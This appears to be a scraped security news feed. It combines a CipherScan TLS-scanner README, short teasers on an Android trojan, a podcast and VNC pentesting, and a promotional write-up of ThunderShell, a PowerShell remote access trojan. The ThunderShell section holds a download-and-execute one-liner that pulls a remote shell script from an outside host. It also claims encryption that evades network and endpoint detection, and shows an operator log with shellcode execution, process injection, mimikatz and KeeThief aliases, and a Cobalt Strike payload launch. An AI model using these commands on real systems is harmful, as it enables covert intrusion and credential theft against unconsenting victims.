CipherScan – Find out which SSL ciphersuites are supported by a target

Cipherscan tests the ordering of the SSL/TLS ciphers on a given target, for all major versions of SSL and TLS. It also extracts some certificates informations, TLS options, OCSP stapling and more. Cipherscan is a wrapper above the openssl s_client command line.Cipherscan is meant to run on all flavors of unix. It ships with its own built of OpenSSL for Linux/64 and Darwin/64. On other platform, it will use the openssl version provided by the operating system (which may have limited ciphers support), or your own version provided in the -o command line flag.ExamplesBasic test:$ ./cipherscan google.com……………….Target: google.com:443prio ciphersuite protocols pfs curves1 ECDHE-RSA-CHACHA20-POLY1305 TLSv1.2 ECDH,P-256,256bits prime256v12 ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 ECDH,P-256,256bits prime256v13 ECDHE-RSA-AES128-SHA TLSv1.1,TLSv1.2 ECDH,P-256,256bits prime256v14 ECDHE-RSA-RC4-SHA SSLv3,TLSv1,TLSv1.1,TLSv1.2 ECDH,P-256,256bits prime256v15 AES128-GCM-SHA256 TLSv1.2 None None6 AES128-SHA256 TLSv1.2 None None7 AES128-SHA TLSv1.1,TLSv1.2 None None8 RC4-SHA SSLv3,TLSv1,TLSv1.1,TLSv1.2 None None9 RC4-MD5 SSLv3,TLSv1,TLSv1.1,TLSv1.2 None None10 ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2 ECDH,P-256,256bits prime256v111 ECDHE-RSA-AES256-SHA384 TLSv1.2 ECDH,P-256,256bits prime256v112 ECDHE-RSA-AES256-SHA SSLv3,TLSv1,TLSv1.1,TLSv1.2 ECDH,P-256,256bits prime256v113 AES256-GCM-SHA384 TLSv1.2 None None14 AES256-SHA256 TLSv1.2 None None15 AES256-SHA SSLv3,TLSv1,TLSv1.1,TLSv1.2 None None16 ECDHE-RSA-AES128-SHA256 TLSv1.2 ECDH,P-256,256bits prime256v117 ECDHE-RSA-DES-CBC3-SHA SSLv3,TLSv1,TLSv1.1,TLSv1.2 ECDH,P-256,256bits prime256v118 DES-CBC3-SHA SSLv3,TLSv1,TLSv1.1,TLSv1.2 None NoneCertificate: trusted, 2048 bit, sha1WithRSAEncryption signatureTLS ticket lifetime hint: 100800OCSP stapling: not supportedCipher ordering: serverTesting STARTTLS:darwin$ $ ./cipherscan –curves -starttls xmpp jabber.ccc.de:5222…………………………..Target: jabber.ccc.de:5222prio ciphersuite protocols pfs curves1 ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2 ECDH,P-256,256bits prime256v12 ECDHE-RSA-AES256-SHA384 TLSv1.2 ECDH,P-256,256bits prime256v13 ECDHE-RSA-AES256-SHA TLSv1,TLSv1.1,TLSv1.2 ECDH,P-256,256bits prime256v14 DHE-RSA-AES256-GCM-SHA384 TLSv1.2 DH,1024bits None5 DHE-RSA-AES256-SHA256 TLSv1.2 DH,1024bits None6 DHE-RSA-AES256-SHA TLSv1,TLSv1.1,TLSv1.2 DH,1024bits None7 DHE-RSA-CAMELLIA256-SHA TLSv1,TLSv1.1,TLSv1.2 DH,1024bits None8 AES256-GCM-SHA384 TLSv1.2 None None9 AES256-SHA256 TLSv1.2 None None10 AES256-SHA TLSv1,TLSv1.1,TLSv1.2 None None11 CAMELLIA256-SHA TLSv1,TLSv1.1,TLSv1.2 None None12 ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 ECDH,P-256,256bits prime256v113 ECDHE-RSA-AES128-SHA256 TLSv1.2 ECDH,P-256,256bits prime256v114 ECDHE-RSA-AES128-SHA TLSv1,TLSv1.1,TLSv1.2 ECDH,P-256,256bits prime256v115 DHE-RSA-AES128-GCM-SHA256 TLSv1.2 DH,1024bits None16 DHE-RSA-AES128-SHA256 TLSv1.2 DH,1024bits None17 DHE-RSA-AES128-SHA TLSv1,TLSv1.1,TLSv1.2 DH,1024bits None18 DHE-RSA-SEED-SHA TLSv1,TLSv1.1,TLSv1.2 DH,1024bits None19 DHE-RSA-CAMELLIA128-SHA TLSv1,TLSv1.1,TLSv1.2 DH,1024bits None20 AES128-GCM-SHA256 TLSv1.2 None None21 AES128-SHA256 TLSv1.2 None None22 AES128-SHA TLSv1,TLSv1.1,TLSv1.2 None None23 SEED-SHA TLSv1,TLSv1.1,TLSv1.2 None None24 CAMELLIA128-SHA TLSv1,TLSv1.1,TLSv1.2 None NoneCertificate: UNTRUSTED, 2048 bit, sha1WithRSAEncryption signatureTLS ticket lifetime hint: NoneOCSP stapling: not supportedCipher ordering: clientCurves ordering: serverCurves fallback: FalseExporting to JSON with the -j command line option:$ ./cipherscan –curves -j www.ebay.com | j{ “curves_fallback": "False", "serverside": "True", "target": "www.ebay.com:443", "utctimestamp": "2015-04-03T14:54:31.0Z", "ciphersuite": [ { "cipher": "AES256-SHA", "ocsp_stapling": "False", "pfs": "None", "protocols": [ "TLSv1", "TLSv1.1", "TLSv1.2" ], "pubkey": [ "2048" ], "sigalg": [ "sha1WithRSAEncryption" ], "ticket_hint": "None", "trusted": "True" }, { "cipher": "ECDHE-RSA-DES-CBC3-SHA", "curves": [ "prime256v1", "secp384r1", "secp224r1", "secp521r1" ], "curves_ordering": "server", "ocsp_stapling": "False", "pfs": "ECDH,P-256,256bits", "protocols": [ "TLSv1", "TLSv1.1", "TLSv1.2" ], "pubkey": [ "2048" ], "sigalg": [ "sha1WithRSAEncryption" ], "ticket_hint": "None", "trusted": "True" } ]}Analyzing configurationsThe motivation behind cipherscan is to help operators configure good TLS on their endpoints. To help this further, the script analyze.py compares the results of a cipherscan with the TLS guidelines from https://wiki.mozilla.org/Security/Server_Side_TLS and output a level and recommendations.$ ./analyze.py -t jve.linuxwall.infojve.linuxwall.info:443 has intermediate tlsChanges needed to match the old level:* consider enabling SSLv3* add cipher DES-CBC3-SHA* use a certificate with sha1WithRSAEncryption signature* consider enabling OCSP StaplingChanges needed to match the intermediate level:* consider enabling OCSP StaplingChanges needed to match the modern level:* remove cipher AES128-GCM-SHA256* remove cipher AES256-GCM-SHA384* remove cipher AES128-SHA256* remove cipher AES128-SHA* remove cipher AES256-SHA256* remove cipher AES256-SHA* disable TLSv1* consider enabling OCSP StaplingIn the output above, analyze.py indicates that the target jve.linuxwall.info matches the intermediate configuration level. If the administrator of this site wants to reach the modern level, the items that failed under the modern tests should be corrected.analyze.py does not make any assumption on what a good level should be. Sites operators should now what level they want to match against, based on the compatibility level they want to support. Again, refer to https://wiki.mozilla.org/Security/Server_Side_TLS for more information.Note on Nagios mode: analyse.py can be ran as a nagios check with –nagios. The exit code will then represent the state of the configuration:2 (critical) for bad tls1 (warning) if it doesn’t match the desired level0 (ok) if it matches. cipherscan can take more than 10 seconds to complete. To alleviate any timeout issues, you may want to run it outside of nagios, passing data through some temporary file.OpenSSLCipherscan uses a custom release of openssl for linux 64 bits and darwin 64 bits. OpenSSL is build from a custom branch maintained by Peter Mosmans that includes a number of patches not merged upstream. It can be found here: https://github.com/PeterMosmans/opensslYou can build it yourself using following commands:git clone https://github.com/PeterMosmans/openssl.git –depth 1 -b 1.0.2-chachacd openssl./Configure zlib no-shared experimental-jpake enable-md2 enable-rc5 \enable-rfc3779 enable-gost enable-static-engine linux-x86_64make dependmakemake reportThe statically linked binary will be apps/openssl.ContributorsJulien Vehent julien@linuxwall.info (original author)Hubert Kario hkario@redhat.com (co-maintainer)Pepi Zawodsky git@maclemon.atMichael Zeltner m@niij.orgPeter Mosmans support@go-forward.netVincent Riquer v.riquer@b2f-concept.comChristian Stadelmann dev@genodeftest.deSimon Deziel simon.deziel@gmail.comAaron Zauner azet@azet.orgMike mikedawg@gmail.comPhil Cohen phlipper@users.noreply.github.comSamuel Kleiner sam@firstbanco.comRichard Soderberg https://twitter.com/floatingatollAdam Crosby adamcrosby@users.noreply.github.comDownload CipherScan

Link: http://feedproxy.google.com/~r/PentestTools/~3/4y1FdVB4Ia8/cipherscan-find-out-which-ssl.html

A Trojan Disguised as a Keyboard App

A Trojan disguised as a keyboard app performs various operations on a user’s device Trustlook Labs discovered a Trojan taking advantage of the “su” command in a rooted Android device to perform malicious activities. The Trojan makes its way on to a device as a fake keyboard app named “AOSP keyboard.” Once the user executes … Continue reading A Trojan Disguised as a Keyboard App

Link: https://blog.trustlook.com/2017/09/30/a-trojan-disguised-as-a-keyboard-app/

Barrett Lyon, Neustar – Startup Security Weekly #57

Barrett Lyon is the Vice President of Research and Development for the Neustar Security Solutions’ portfolio. He spearheads the development of innovative new products and solutions for the company’s industry-leading DDoS, DNS and cybersecurity solutions. He shows us how he does it all! Full Show Notes Visit http://securityweekly.com/category/ssw for all the latest episodes!
The post Barrett Lyon, Neustar – Startup Security Weekly #57 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/pPZvmjvwM5E/

ThunderShell – PowerShell based RAT

ThunderShell is a Powershell based RAT that rely on HTTP request to communicate. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network hooks.Dependenciesapt install redis-serverapt install python-redisLogsEvery errors, http requests and commands are logged in the logs folder.How it worksOnce the PowerShell script is executed and HTTP request will be issued to the server. The body of each POST request contains the RC4 encrypted communication. Why RC4 because it’s strong enough to hide the traffic. The idea is to upload / download data over the network that cannot be inspected. The RAT support HTTPS but some security product may perform SSL interception and obtain visibility on your data leading to detection of malicious payload (PowerShell script, stager etc…). The RC4 encryption allows you to communicate over the wire without leaking your payload. The RC4 encryption also protects against endpoint agent that inspects traffic directly on the host, again the traffic is decrypted at the “software" level blocking detection at that level too.To use the power of the tool there is some built-in function such as fetch, exec and upload that allow you to run your payload quite easily.Fetch flowThe server will fetch a resource (path, url) Send the data over the RC4 encrypted channel The PowerShell RAT will decrypt the payload PowerShell Execute the final payloadFor example if you fetch PowerView.ps1 script it will be fully encrypted over the wire avoiding detection since the server is proxying the request and fully encrypt the data.UsageVictim:powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘http://ringzer0team.com/PS-RemoteShell.ps1’); PS-RemoteShell -ip 1.1.1.1 -port 8080 -Key test -Delay 2000Attacker side example:default.json:{ "redis-host": "localhost", "redis-port": 6379, "http-host": "192.168.17.129", "http-port": 8080, "http-server": "Microsoft-IIS/7.5", "https-enabled": "off", "https-cert-path": "cert.pem", "encryption-key": "test", "max-output-timeout": 5}me@debian-dev:~$ python ThunderShell.py default.jsonThunder Shell 1.1 | Clients Server CLIMr.Un1k0d3r RingZer0 Team 2017——————————————————–[+] Starting web server on 192.168.17.129 port 8080(Main)>>>[+] Registering new shell 10.0.0.153:RingZer0\MrUn1k0d3r[+] New shell ID 13 GUID is 4c05a17f-036a-4cd4-9446-da46281d5754[-] is not a valid command(Main)>>> helpHelp Menu———————– list args (full) List all active shells interact args (id) Interact with a session show args (error/http/event, count) Show error, http or event log (default number of rows 10) kill args (id) Kill shell (clear db only) exit Exit the application help Show this help menu(Main)>>> listList of active shells———————– 4 x64 – 10.0.0.153:RingZer0\MrUn1k0d3r 3 x64 – 10.0.0.153:RingZer0\MrUn1k0d3r 2 x64 – 10.0.0.153:RingZer0\MrUn1k0d3r 1 x64 – 10.0.0.153:RingZer0\MrUn1k0d3r(Main)>>> list fullList of active shells———————– 4 x64 – 10.0.0.153:RingZer0\MrUn1k0d3r 2836ccdc-6747-45a4-8461-fa4022ac6bd0 last seen 13/09/2017 09:59:32 3 x64 – 10.0.0.153:RingZer0\MrUn1k0d3r d09093a0-d3d7-4de9-b3a9-191ab7b2fef1 last seen 13/09/2017 09:54:31 2 x64 – 10.0.0.153:RingZer0\MrUn1k0d3r 8d95e7c8-6868-4eb3-8ba8-231a1fdfcb92 last seen 13/09/2017 09:50:18 1 x64 – 10.0.0.153:RingZer0\MrUn1k0d3r 90c608da-b64d-4d3a-9336-458e73658e49 last seen 12/09/2017 18:27:47(Main)>>> interact 4(x64 – 10.0.0.153:RingZer0\MrUn1k0d3r)>>> helpShell Help Menu———————– background Return to the main console refresh Check for previous commands output fetch args (path/url, command) In memory execution of a script and execute a commmand exec args (path/url) In memory execution of code (shellcode) read args (remote path) Read a file on the remote host upload args (path/url, path) Upload a file on the remote system ps List processes powerless args (powershell) Execute Powershell command without invoking Powershell inject args (32/64, pid, command)Inject command into a target process (max length 4096) alias args (key, value) Create an alias to avoid typing the same thing over and over delay args (milliseconds) Update the callback delay help Show this help menuList of built in alias———————– powerup PowerUp tool set wmiexec Remote-WmiExecute utility searchevent Search-EventForUser utility keethief KeeThief tool set (Get-KeePassDatabaseKey) mimikatz Invoke-Mimikatz utility inveigh Invoke-Inveigh utility powerview PowerView tool setList user defined alias———————–(x64 – 10.0.0.153:RingZer0\MrUn1k0d3r)>>> whoamiRingZer0\MrUn1k0d3r(x64 – 10.0.0.153:RingZer0\MrUn1k0d3r)>>> delay 0Updating delay to 0Delay is now 0(x64 – 10.0.0.153:RingZer0\MrUn1k0d3r)>>> fetch powerview Get-NetLocalGroup -ComputerName 127.0.0.1[+] Fetching https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1[+] Executing Get-NetLocalGroup -ComputerName 127.0.0.1(x64 – 10.0.0.153:RingZer0\MrUn1k0d3r)>>> refreshComputerName : 127.0.0.1AccountName : 10-R90G3RLC-1GG/AdministratorIsDomain : FalseIsGroup : FalseSID : S-1-5-21-Description : Built-in account for administering the computer/domainPwdLastSet : 8/11/2017 6:01:45 PMPwdExpired : FalseUserFlags : 66049Disabled : FalseLastLogin : 8/11/2017 5:58:47 PM(x64 – 10.0.0.153:RingZer0\MrUn1k0d3r)>>> fetch https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamPowershellScripts/master/scripts/Get-BrowserHomepage.ps1 Get-BrowserHomepage[+] Fetching https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamPowershellScripts/master/scripts/Get-BrowserHomepage.ps1[+] Executing Get-BrowserHomepageStart Page———-https://www.ringzer0team.com/(x64 – 10.0.0.153:RingZer0\MrUn1k0d3r)>>> ps PID Name Owner CommandLine — —- —– ———– 0 System Idle Process 4 System 364 smss.exe 492 csrss.exe(x64 – 10.0.0.153:RingZer0\MrUn1k0d3r)>>> exec /home/attacker/cobaltstrike-reverse-https[+] Fetching /home/attacker/cobaltstrike-reverse-https[+] Payload should be executed shortly on the target(x64 – 10.0.0.153:RingZer0\MrUn1k0d3r)>>> background(Main)>>> show httpLast 10 lines of log———————–192.168.17.1 (Wed Sep 13 17:09:42 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1192.168.17.1 (Wed Sep 13 17:09:40 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1192.168.17.1 (Wed Sep 13 17:09:38 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1192.168.17.1 (Wed Sep 13 17:09:35 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1CreditMr.Un1k0d3r RingZer0 Team 2017Download ThunderShell

Link: http://feedproxy.google.com/~r/PentestTools/~3/wrbBYVaRYp4/thundershell-powershell-based-rat.html

VNC Penetration Testing

Welcome to Internal penetration testing on VNC server where you will learn VNC installation and configuration, enumeration and attack, system security and precaution. From Wikipedia  Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in… Continue reading →
The post VNC Penetration Testing appeared first on Hacking Articles.

Link: http://www.hackingarticles.in/vnc-penetration-testing/